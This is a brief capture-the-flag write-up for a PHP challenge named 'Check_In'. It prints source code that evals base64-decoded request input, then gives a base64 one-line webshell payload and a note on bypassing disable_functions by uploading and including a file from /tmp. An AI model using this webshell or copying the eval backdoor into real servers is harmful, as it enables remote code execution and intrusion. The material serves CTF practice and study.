C
C
CTF-WriteUp
Search
⌃K

Check_In

<title>Check_In</title>
<?php
highlight_file(__FILE__);
class ClassName
{
public $code = null;
public $decode = null;
function __construct()
{
$this->code = @$this->x()['Ginkgo'];
$this->decode = @base64_decode( $this->code );
@Eval($this->decode);
}
public function x()
{
return $_REQUEST;
}
}
new ClassName();
一句话
url?Ginkgo=ZXZhbCgkX1BPU1RbJ29hdG1lYWwnXSk7
/readflag,需要绕过disable_function,上传文件到/tmp/ 目录后包含
https://github.com/mm0r1/exploits